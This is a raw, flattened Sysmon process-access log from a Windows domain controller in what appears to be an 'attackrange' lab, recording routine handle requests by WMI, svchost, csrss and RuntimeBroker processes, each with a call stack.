16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029220Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029219Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029218Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029217Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029216Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029215Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029214Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029213Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029212Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029211Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029210Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029209Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029208Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.253{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029338Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.252{7901BC46-4A8A-6008-FD00-00000000A301}46923992C:\Windows\System32\RuntimeBroker.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000029337Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.252{7901BC46-4A8A-6008-FD00-00000000A301}46923992C:\Windows\System32\RuntimeBroker.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000029336Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.221{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-53E9-6008-AD06-00000000A301}6492C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029335Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.206{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-53E9-6008-AD06-00000000A301}6492C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029334Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.206{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-53E9-6008-AD06-00000000A301}6492C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029333Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029332Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029331Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:45.159{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 